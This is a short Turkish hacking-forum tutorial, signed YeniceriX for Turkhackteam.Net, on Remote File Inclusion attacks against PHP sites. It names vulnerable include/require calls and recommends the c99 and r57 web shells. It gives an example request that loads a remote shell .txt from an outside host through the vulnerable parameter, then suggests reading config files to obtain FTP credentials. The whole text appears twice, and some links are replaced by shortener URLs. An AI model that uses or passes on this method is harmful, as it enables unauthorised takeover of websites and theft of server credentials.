Sitede birçok döküman var. Çok sade yazılanlar da var ama yine de kısaca açıklamak istedim...
(Turkhackteam.Net)
Bir PHP sitesinde(Turkhackteam.Net)
include($bilmemne)
require($bilmemne)
include_once($bilmemne)
require_once($bilmemne)
gibi parametreler sisteme uzaktan kod çağırılmasını sağlar...
c99 veya r57 denen sheller var internetten bulabilirsiniz.(Turkhackteam.Net)
r57 biraz daha gelişmiş özelliklere sahiptir anlaşılması c99'a göre daha zordur..
Bu sheller bir siteye txt belgesi şeklinde atılır.
Ör: https://tik.lat/1x0tG şeklinde...
(Turkhackteam.Net)
Daha sonra bu hatalı parametrenin olduğu dosya diyelim ki asd.php , site adı qwe.com olsun olsun.(Turkhackteam.Net)
Şu şekilde kodumuz tamamlanır ve siteye RFI atağında bulunmuş oluruz:
(Turkhackteam.Net)
https://tik.lat/X5XVn bilmemne=http://www.site.com/r57.txt?
(Turkhackteam.Net)
Daha sonra zaten shell çalışınca yazma hakkı varsa ne âlâ.. Yoksa da config okuyarak FTP almaya çalışabilirsiniz...(Turkhackteam.Net)
Kısaca anlatmaya çalıştım ancak yine de sitedeki dökümanlara göz atın derim...
Bu döküman YeniceriX tarafından Turkhackteam.Net ailesi için yazılmıştır...
Anlaşılmayan noktaları sorun arkadaşlar...
//YeniceriX (Turkhackteam.Net)
//YeniceriX
(Turkhackteam.Net)
Bir PHP sitesinde(Turkhackteam.Net)
include($bilmemne)
require($bilmemne)
include_once($bilmemne)
require_once($bilmemne)
gibi parametreler sisteme uzaktan kod çağırılmasını sağlar...
c99 veya r57 denen sheller var internetten bulabilirsiniz.(Turkhackteam.Net)
r57 biraz daha gelişmiş özelliklere sahiptir anlaşılması c99'a göre daha zordur..
Bu sheller bir siteye txt belgesi şeklinde atılır.
Ör: https://tik.lat/1x0tG şeklinde...
(Turkhackteam.Net)
Daha sonra bu hatalı parametrenin olduğu dosya diyelim ki asd.php , site adı qwe.com olsun olsun.(Turkhackteam.Net)
Şu şekilde kodumuz tamamlanır ve siteye RFI atağında bulunmuş oluruz:
(Turkhackteam.Net)
https://tik.lat/X5XVn bilmemne=http://www.site.com/r57.txt?
(Turkhackteam.Net)
Daha sonra zaten shell çalışınca yazma hakkı varsa ne âlâ.. Yoksa da config okuyarak FTP almaya çalışabilirsiniz...(Turkhackteam.Net)
Kısaca anlatmaya çalıştım ancak yine de sitedeki dökümanlara göz atın derim...
Bu döküman YeniceriX tarafından Turkhackteam.Net ailesi için yazılmıştır...
Anlaşılmayan noktaları sorun arkadaşlar...
//YeniceriX (Turkhackteam.Net)
//YeniceriX